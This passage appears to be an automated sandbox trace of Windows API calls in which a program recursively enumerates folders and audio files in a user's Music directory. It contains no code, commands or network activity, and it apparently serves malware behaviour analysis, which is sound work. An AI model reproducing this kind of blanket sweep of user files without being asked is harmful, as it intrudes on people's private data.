lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.476] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\*", lpFindFileData=0x61de90 | out: lpFindFileData=0x61de90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847a90, ftCreationTime.dwHighDateTime=0x1d5e0f0, ftLastAccessTime.dwLowDateTime=0x65d0360, ftLastAccessTime.dwHighDateTime=0x1d5deba, ftLastWriteTime.dwLowDateTime=0x65d0360, ftLastWriteTime.dwHighDateTime=0x1d5deba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8bb8 [0074.479] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de90 | out: lpFindFileData=0x61de90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847a90, ftCreationTime.dwHighDateTime=0x1d5e0f0, ftLastAccessTime.dwLowDateTime=0x65d0360, ftLastAccessTime.dwHighDateTime=0x1d5deba, ftLastWriteTime.dwLowDateTime=0x65d0360, ftLastWriteTime.dwHighDateTime=0x1d5deba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.479] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de90 | out: lpFindFileData=0x61de90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00a2c0, ftCreationTime.dwHighDateTime=0x1d5daea, ftLastAccessTime.dwLowDateTime=0x10c5a950, ftLastAccessTime.dwHighDateTime=0x1d5dfe2, ftLastWriteTime.dwLowDateTime=0x10c5a950, ftLastWriteTime.dwHighDateTime=0x1d5dfe2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName="ADuuj", cAlternateFileName="")) returned 1 [0074.479] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.479] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\*", lpFindFileData=0x61dc38 | out: lpFindFileData=0x61dc38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00a2c0, ftCreationTime.dwHighDateTime=0x1d5daea, ftLastAccessTime.dwLowDateTime=0x10c5a950, ftLastAccessTime.dwHighDateTime=0x1d5dfe2, ftLastWriteTime.dwLowDateTime=0x10c5a950, ftLastWriteTime.dwHighDateTime=0x1d5dfe2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8c78 [0074.481] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc38 | out: lpFindFileData=0x61dc38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00a2c0, ftCreationTime.dwHighDateTime=0x1d5daea, ftLastAccessTime.dwLowDateTime=0x10c5a950, ftLastAccessTime.dwHighDateTime=0x1d5dfe2, ftLastWriteTime.dwLowDateTime=0x10c5a950, ftLastWriteTime.dwHighDateTime=0x1d5dfe2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.481] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc38 | out: lpFindFileData=0x61dc38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xece70390, ftCreationTime.dwHighDateTime=0x1d5dda6, ftLastAccessTime.dwLowDateTime=0xe92c4280, ftLastAccessTime.dwHighDateTime=0x1d5ddc7, ftLastWriteTime.dwLowDateTime=0xe92c4280, ftLastWriteTime.dwHighDateTime=0x1d5ddc7, nFileSizeHigh=0x0, nFileSizeLow=0xc44, dwReserved0=0x0, dwReserved1=0x657690, cFileName="9zmv2.m4a", cAlternateFileName="")) returned 1 [0074.500] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf96d1f10, ftCreationTime.dwHighDateTime=0x1d5ddcd, ftLastAccessTime.dwLowDateTime=0xc516f910, ftLastAccessTime.dwHighDateTime=0x1d5e463, ftLastWriteTime.dwLowDateTime=0xc516f910, ftLastWriteTime.dwHighDateTime=0x1d5e463, nFileSizeHigh=0x0, nFileSizeLow=0xcb34, dwReserved0=0x10, dwReserved1=0x657690, cFileName="AXe49W4a SJDN r.mp3", cAlternateFileName="AXE49W~1.MP3")) returned 1 [0074.500] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5e18470, ftCreationTime.dwHighDateTime=0x1d5e62a, ftLastAccessTime.dwLowDateTime=0x2e730940, ftLastAccessTime.dwHighDateTime=0x1d5e62f, ftLastWriteTime.dwLowDateTime=0x2e730940, ftLastWriteTime.dwHighDateTime=0x1d5e62f, nFileSizeHigh=0x0, nFileSizeLow=0x675e, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="cxrsN5DPtYDsIm.wav", cAlternateFileName="CXRSN5~1.WAV")) returned 1 [0074.500] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ad4f0, ftCreationTime.dwHighDateTime=0x1d5daa3, ftLastAccessTime.dwLowDateTime=0xa12b5b80, ftLastAccessTime.dwHighDateTime=0x1d5e5cc, ftLastWriteTime.dwLowDateTime=0xa12b5b80, ftLastWriteTime.dwHighDateTime=0x1d5e5cc, nFileSizeHigh=0x0, nFileSizeLow=0x18a5d, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="R64I-TKxh1f.wav", cAlternateFileName="R64I-T~1.WAV")) returned 1 [0074.504] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x1740045, ftCreationTime.dwLowDateTime=0xc321c, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x17, ftLastWriteTime.dwHighDateTime=0x16a0046, nFileSizeHigh=0xc321c, nFileSizeLow=0x6bbff0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="R6\x08", cAlternateFileName="h?aဓ\x03\x10")) returned 0 [0074.504] FindClose (in: hFindFile=0x6b8c78 | out: hFindFile=0x6b8c78) returned 1 [0074.504] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54392d80, ftCreationTime.dwHighDateTime=0x1d5e616, ftLastAccessTime.dwLowDateTime=0x139b4770, ftLastAccessTime.dwHighDateTime=0x1d5dff6, ftLastWriteTime.dwLowDateTime=0x139b4770, ftLastWriteTime.dwHighDateTime=0x1d5dff6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="aJ1lagIQtz", cAlternateFileName="AJ1LAG~1")) returned 1 [0074.506] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.506] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\*", lpFindFileData=0x61dc38 | out: lpFindFileData=0x61dc38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54392d80, ftCreationTime.dwHighDateTime=0x1d5e616, ftLastAccessTime.dwLowDateTime=0x139b4770, ftLastAccessTime.dwHighDateTime=0x1d5dff6, ftLastWriteTime.dwLowDateTime=0x139b4770, ftLastWriteTime.dwHighDateTime=0x1d5dff6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x766c30, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8c78 [0074.508] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc38 | out: lpFindFileData=0x61dc38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54392d80, ftCreationTime.dwHighDateTime=0x1d5e616, ftLastAccessTime.dwLowDateTime=0x139b4770, ftLastAccessTime.dwHighDateTime=0x1d5dff6, ftLastWriteTime.dwLowDateTime=0x139b4770, ftLastWriteTime.dwHighDateTime=0x1d5dff6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x766c30, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.508] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc38 | out: lpFindFileData=0x61dc38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6621ee0, ftCreationTime.dwHighDateTime=0x1d5e716, ftLastAccessTime.dwLowDateTime=0x47c27ea0, ftLastAccessTime.dwHighDateTime=0x1d5e6dc, ftLastWriteTime.dwLowDateTime=0x47c27ea0, ftLastWriteTime.dwHighDateTime=0x1d5e6dc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x766c30, dwReserved1=0x657690, cFileName="-eYbmJwmxhP", cAlternateFileName="-EYBMJ~1")) returned 1 [0074.510] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.510] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\*", lpFindFileData=0x61d9e0 | out: lpFindFileData=0x61d9e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6621ee0, ftCreationTime.dwHighDateTime=0x1d5e716, ftLastAccessTime.dwLowDateTime=0x47c27ea0, ftLastAccessTime.dwHighDateTime=0x1d5e6dc, ftLastWriteTime.dwLowDateTime=0x47c27ea0, ftLastWriteTime.dwHighDateTime=0x1d5e6dc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8d38 [0074.599] FindNextFileW (in: hFindFile=0x6b8d38, lpFindFileData=0x61d9e0 | out: lpFindFileData=0x61d9e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6621ee0, ftCreationTime.dwHighDateTime=0x1d5e716, ftLastAccessTime.dwLowDateTime=0x47c27ea0, ftLastAccessTime.dwHighDateTime=0x1d5e6dc, ftLastWriteTime.dwLowDateTime=0x47c27ea0, ftLastWriteTime.dwHighDateTime=0x1d5e6dc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.599] FindNextFileW (in: hFindFile=0x6b8d38, lpFindFileData=0x61d9e0 | out: lpFindFileData=0x61d9e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f3a8660, ftCreationTime.dwHighDateTime=0x1d5de16, ftLastAccessTime.dwLowDateTime=0xbaaf0410, ftLastAccessTime.dwHighDateTime=0x1d5dc64, ftLastWriteTime.dwLowDateTime=0xbaaf0410, ftLastWriteTime.dwHighDateTime=0x1d5dc64, nFileSizeHigh=0x0, nFileSizeLow=0x181e2, dwReserved0=0x4, dwReserved1=0x657690, cFileName="Ftar8k3covO_ce7D.wav", cAlternateFileName="FTAR8K~1.WAV")) returned 1 [0074.599] FindNextFileW (in: hFindFile=0x6b8d38, lpFindFileData=0x61d9c8 | out: lpFindFileData=0x61d9c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x223d2d0, ftCreationTime.dwHighDateTime=0x1d5da62, ftLastAccessTime.dwLowDateTime=0x2574c2b0, ftLastAccessTime.dwHighDateTime=0x1d5e60d, ftLastWriteTime.dwLowDateTime=0x2574c2b0, ftLastWriteTime.dwHighDateTime=0x1d5e60d, nFileSizeHigh=0x0, nFileSizeLow=0x122b9, dwReserved0=0x10, dwReserved1=0x657690, cFileName="teBq0VdNSx.wav", cAlternateFileName="TEBQ0V~1.WAV")) returned 1 [0074.599] FindNextFileW (in: hFindFile=0x6b8d38, lpFindFileData=0x61d9c8 | out: lpFindFileData=0x61d9c8*(dwFileAttributes=0x1980033, ftCreationTime.dwLowDateTime=0xc327c, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x18e0034, nFileSizeHigh=0xc327c, nFileSizeLow=0x76b9d8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="te\x08", cAlternateFileName="h?aဓ\x03\x10")) returned 0 [0074.599] FindClose (in: hFindFile=0x6b8d38 | out: hFindFile=0x6b8d38) returned 1 [0074.599] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbda6fa30, ftCreationTime.dwHighDateTime=0x1d5df8c, ftLastAccessTime.dwLowDateTime=0xfe7dc3e0, ftLastAccessTime.dwHighDateTime=0x1d5dfb4, ftLastWriteTime.dwLowDateTime=0xfe7dc3e0, ftLastWriteTime.dwHighDateTime=0x1d5dfb4, nFileSizeHigh=0x0, nFileSizeLow=0xa854, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="7iHROd3G.wav", cAlternateFileName="")) returned 1 [0074.599] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x822c4ab0, ftCreationTime.dwHighDateTime=0x1d5dcc0, ftLastAccessTime.dwLowDateTime=0x45537f10, ftLastAccessTime.dwHighDateTime=0x1d5e179, ftLastWriteTime.dwLowDateTime=0x45537f10, ftLastWriteTime.dwHighDateTime=0x1d5e179, nFileSizeHigh=0x0, nFileSizeLow=0x64c5, dwReserved0=0x10, dwReserved1=0x657690, cFileName="K4cO 93Mbgwb3udHm.m4a", cAlternateFileName="K4CO93~1.M4A")) returned 1 [0074.600] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a4a880, ftCreationTime.dwHighDateTime=0x1d5d87d, ftLastAccessTime.dwLowDateTime=0xd95b64b0, ftLastAccessTime.dwHighDateTime=0x1d5df54, ftLastWriteTime.dwLowDateTime=0xd95b64b0, ftLastWriteTime.dwHighDateTime=0x1d5df54, nFileSizeHigh=0x0, nFileSizeLow=0x1bd9, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="KQpDY.m4a", cAlternateFileName="")) returned 1 [0074.600] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8b7f0, ftCreationTime.dwHighDateTime=0x1d5e216, ftLastAccessTime.dwLowDateTime=0x8a4c7a00, ftLastAccessTime.dwHighDateTime=0x1d5da34, ftLastWriteTime.dwLowDateTime=0x8a4c7a00, ftLastWriteTime.dwHighDateTime=0x1d5da34, nFileSizeHigh=0x0, nFileSizeLow=0x77bb, dwReserved0=0x10, dwReserved1=0x657690, cFileName="LfTuLY5i.wav", cAlternateFileName="")) returned 1 [0074.600] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1f88950, ftCreationTime.dwHighDateTime=0x1d5db3a, ftLastAccessTime.dwLowDateTime=0x15ec7d10, ftLastAccessTime.dwHighDateTime=0x1d5d8e8, ftLastWriteTime.dwLowDateTime=0x15ec7d10, ftLastWriteTime.dwHighDateTime=0x1d5d8e8, nFileSizeHigh=0x0, nFileSizeLow=0x10b3f, dwReserved0=0x10, dwReserved1=0x657690, cFileName="snzbfu-3Qx.m4a", cAlternateFileName="SNZBFU~1.M4A")) returned 1 [0074.600] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x1780044, ftCreationTime.dwLowDateTime=0xc32d5, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x17c0045, nFileSizeHigh=0xc32d5, nFileSizeLow=0x2f, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="?a\x08", cAlternateFileName="h?aဓ\x03\x10")) returned 0 [0074.600] FindClose (in: hFindFile=0x6b8c78 | out: hFindFile=0x6b8c78) returned 1 [0074.601] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf67429e0, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0xd410af80, ftLastAccessTime.dwHighDateTime=0x1d5e380, ftLastWriteTime.dwLowDateTime=0xd410af80, ftLastWriteTime.dwHighDateTime=0x1d5e380, nFileSizeHigh=0x0, nFileSizeLow=0xdf62, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="APDdf3aoZrXaHEczyAP.wav", cAlternateFileName="APDDF3~1.WAV")) returned 1 [0074.601] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc9942e0, ftCreationTime.dwHighDateTime=0x1d5e43c, ftLastAccessTime.dwLowDateTime=0xf87f1f10, ftLastAccessTime.dwHighDateTime=0x1d5e37f, ftLastWriteTime.dwLowDateTime=0xf87f1f10, ftLastWriteTime.dwHighDateTime=0x1d5e37f, nFileSizeHigh=0x0, nFileSizeLow=0xcfe0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="LWhz.m4a", cAlternateFileName="")) returned 1 [0074.601] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d653a10, ftCreationTime.dwHighDateTime=0x1d5de51, ftLastAccessTime.dwLowDateTime=0x3ed32d90, ftLastAccessTime.dwHighDateTime=0x1d5e217, ftLastWriteTime.dwLowDateTime=0x3ed32d90, ftLastWriteTime.dwHighDateTime=0x1d5e217, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="rWwrmZhuo4", cAlternateFileName="RWWRMZ~1")) returned 1 [0074.601] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.601] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\*", lpFindFileData=0x61dc38 | out: lpFindFileData=0x61dc38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d653a10, ftCreationTime.dwHighDateTime=0x1d5de51, ftLastAccessTime.dwLowDateTime=0x3ed32d90, ftLastAccessTime.dwHighDateTime=0x1d5e217, ftLastWriteTime.dwLowDateTime=0x3ed32d90, ftLastWriteTime.dwHighDateTime=0x1d5e217, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8c78 [0074.601] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc38 | out: lpFindFileData=0x61dc38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d653a10, ftCreationTime.dwHighDateTime=0x1d5de51, ftLastAccessTime.dwLowDateTime=0x3ed32d90, ftLastAccessTime.dwHighDateTime=0x1d5e217, ftLastWriteTime.dwLowDateTime=0x3ed32d90, ftLastWriteTime.dwHighDateTime=0x1d5e217, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.601] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc38 | out: lpFindFileData=0x61dc38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5992d6e0, ftCreationTime.dwHighDateTime=0x1d5dc44, ftLastAccessTime.dwLowDateTime=0x6a6a3790, ftLastAccessTime.dwHighDateTime=0x1d5e1af, ftLastWriteTime.dwLowDateTime=0x6a6a3790, ftLastWriteTime.dwHighDateTime=0x1d5e1af, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName="eGfFOaa4l", cAlternateFileName="EGFFOA~1")) returned 1 [0074.601] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.601] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\*", lpFindFileData=0x61d9e0 | out: lpFindFileData=0x61d9e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5992d6e0, ftCreationTime.dwHighDateTime=0x1d5dc44, ftLastAccessTime.dwLowDateTime=0x6a6a3790, ftLastAccessTime.dwHighDateTime=0x1d5e1af, ftLastWriteTime.dwLowDateTime=0x6a6a3790, ftLastWriteTime.dwHighDateTime=0x1d5e1af, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8d38 [0074.601] FindNextFileW (in: hFindFile=0x6b8d38, lpFindFileData=0x61d9e0 | out: lpFindFileData=0x61d9e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5992d6e0, ftCreationTime.dwHighDateTime=0x1d5dc44, ftLastAccessTime.dwLowDateTime=0x6a6a3790, ftLastAccessTime.dwHighDateTime=0x1d5e1af, ftLastWriteTime.dwLowDateTime=0x6a6a3790, ftLastWriteTime.dwHighDateTime=0x1d5e1af, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.601] FindNextFileW (in: hFindFile=0x6b8d38, lpFindFileData=0x61d9e0 | out: lpFindFileData=0x61d9e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x301269d0, ftCreationTime.dwHighDateTime=0x1d5e55d, ftLastAccessTime.dwLowDateTime=0xda3bfd50, ftLastAccessTime.dwHighDateTime=0x1d5d7d8, ftLastWriteTime.dwLowDateTime=0xda3bfd50, ftLastWriteTime.dwHighDateTime=0x1d5d7d8, nFileSizeHigh=0x0, nFileSizeLow=0x7f10, dwReserved0=0x4, dwReserved1=0x657690, cFileName="HdCQAGk.mp3", cAlternateFileName="")) returned 1 [0074.602] FindNextFileW (in: hFindFile=0x6b8d38, lpFindFileData=0x61d9c8 | out: lpFindFileData=0x61d9c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de63150, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0x3328d30, ftLastAccessTime.dwHighDateTime=0x1d5db32, ftLastWriteTime.dwLowDateTime=0x3328d30, ftLastWriteTime.dwHighDateTime=0x1d5db32, nFileSizeHigh=0x0, nFileSizeLow=0xf5b7, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="iytLsFHuHj3z6gYMj.m4a", cAlternateFileName="IYTLSF~1.M4A")) returned 1 [0074.602] FindNextFileW (in: hFindFile=0x6b8d38, lpFindFileData=0x61d9c8 | out: lpFindFileData=0x61d9c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c108870, ftCreationTime.dwHighDateTime=0x1d5dba5, ftLastAccessTime.dwLowDateTime=0x200a6cc0, ftLastAccessTime.dwHighDateTime=0x1d5e384, ftLastWriteTime.dwLowDateTime=0x200a6cc0, ftLastWriteTime.dwHighDateTime=0x1d5e384, nFileSizeHigh=0x0, nFileSizeLow=0x1227f, dwReserved0=0x10, dwReserved1=0x657690, cFileName="O8LnB5uJ.mp3", cAlternateFileName="")) returned 1 [0074.602] FindNextFileW (in: hFindFile=0x6b8d38, lpFindFileData=0x61d9c8 | out: lpFindFileData=0x61d9c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf51d2450, ftCreationTime.dwHighDateTime=0x1d5dd69, ftLastAccessTime.dwLowDateTime=0xc396bae0, ftLastAccessTime.dwHighDateTime=0x1d5d8a0, ftLastWriteTime.dwLowDateTime=0xc396bae0, ftLastWriteTime.dwHighDateTime=0x1d5d8a0, nFileSizeHigh=0x0, nFileSizeLow=0xb998, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="pKoP0.mp3", cAlternateFileName="")) returned 1 [0074.602] FindNextFileW (in: hFindFile=0x6b8d38, lpFindFileData=0x61d9c8 | out: lpFindFileData=0x61d9c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeae40630, ftCreationTime.dwHighDateTime=0x1d5dbba, ftLastAccessTime.dwLowDateTime=0xa2987a80, ftLastAccessTime.dwHighDateTime=0x1d5e805, ftLastWriteTime.dwLowDateTime=0xa2987a80, ftLastWriteTime.dwHighDateTime=0x1d5e805, nFileSizeHigh=0x0, nFileSizeLow=0xbbd, dwReserved0=0x10, dwReserved1=0x657690, cFileName="S1qr7.wav", cAlternateFileName="")) returned 1 [0074.602] FindNextFileW (in: hFindFile=0x6b8d38, lpFindFileData=0x61d9c8 | out: lpFindFileData=0x61d9c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbe5ec70, ftCreationTime.dwHighDateTime=0x1d5d8d9, ftLastAccessTime.dwLowDateTime=0xa5315d20, ftLastAccessTime.dwHighDateTime=0x1d5e38c, ftLastWriteTime.dwLowDateTime=0xa5315d20, ftLastWriteTime.dwHighDateTime=0x1d5e38c, nFileSizeHigh=0x0, nFileSizeLow=0x8f92, dwReserved0=0x10, dwReserved1=0x657690, cFileName="WWUbMhmKz.wav", cAlternateFileName="WWUBMH~1.WAV")) returned 1 [0074.602] FindNextFileW (in: hFindFile=0x6b8d38, lpFindFileData=0x61d9c8 | out: lpFindFileData=0x61d9c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cd34cb0, ftCreationTime.dwHighDateTime=0x1d5e465, ftLastAccessTime.dwLowDateTime=0x4145b680, ftLastAccessTime.dwHighDateTime=0x1d5de2d, ftLastWriteTime.dwLowDateTime=0x4145b680, ftLastWriteTime.dwHighDateTime=0x1d5de2d, nFileSizeHigh=0x0, nFileSizeLow=0x7b69, dwReserved0=0x10, dwReserved1=0x657690, cFileName="y3qZNbvqKQ2uR4UOsf8q.wav", cAlternateFileName="Y3QZNB~1.WAV")) returned 1 [0074.602] FindNextFileW (in: hFindFile=0x6b8d38, lpFindFileData=0x61d9c8 | out: lpFindFileData=0x61d9c8*(dwFileAttributes=0x18e0033, ftCreationTime.dwLowDateTime=0xc3390, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x1d, ftLastWriteTime.dwHighDateTime=0x1840034, nFileSizeHigh=0xc3390, nFileSizeLow=0x6bbff0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="y3\x08", cAlternateFileName="h?aဓ\x03\x10")) returned 0 [0074.602] FindClose (in: hFindFile=0x6b8d38 | out: hFindFile=0x6b8d38) returned 1 [0074.605] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13b8c90, ftCreationTime.dwHighDateTime=0x1d5e3a0, ftLastAccessTime.dwLowDateTime=0x90f56120, ftLastAccessTime.dwHighDateTime=0x1d5d9a1, ftLastWriteTime.dwLowDateTime=0x90f56120, ftLastWriteTime.dwHighDateTime=0x1d5d9a1, nFileSizeHigh=0x0, nFileSizeLow=0xd1c3, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="JRSQYNIKKQeiTV.mp3", cAlternateFileName="JRSQYN~1.MP3")) returned 1 [0074.605] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53d4760, ftCreationTime.dwHighDateTime=0x1d5e451, ftLastAccessTime.dwLowDateTime=0x2c837c60, ftLastAccessTime.dwHighDateTime=0x1d5d7d8, ftLastWriteTime.dwLowDateTime=0x2c837c60, ftLastWriteTime.dwHighDateTime=0x1d5d7d8, 